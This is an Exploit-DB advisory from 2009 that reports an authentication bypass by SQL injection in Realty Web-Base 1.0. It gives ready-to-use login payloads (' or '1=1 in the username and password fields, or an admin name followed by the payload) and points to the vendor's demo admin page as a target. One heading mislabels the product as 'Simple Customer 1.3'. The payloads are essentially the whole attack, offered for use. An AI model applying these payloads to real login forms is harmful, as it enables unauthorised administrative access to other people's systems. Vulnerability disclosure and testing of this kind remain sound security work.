Realty Web-Base 1.0 - Authentication Bypass

EDB-ID:

8643




Platform:

PHP

Date:

2009-05-08


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

---------------------------------------------------------------
------------------------------------------------------------
Realty Web-Base v1.0 (Auth bypass) SQL Injection Vulnerability       
---------------------------------------------------------------

Founder : ThE g0bL!N
Home:WwW.h4ckF0u.CoM
Vendor:http://www.realtywebware.com
---------------------------------------------------------------
---------------------------------------------------------------

Simple Customer 1.3 SQL Injection Vulnerability
------------------------------------------------
username :' or '1=1

Password: ' or '1=1
         Or
username:[admin_name]' or '1=1


password: Nothing
--------------------------------------
Dem0
----
http://www.realtywebware.com/demo/admin/

--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-08]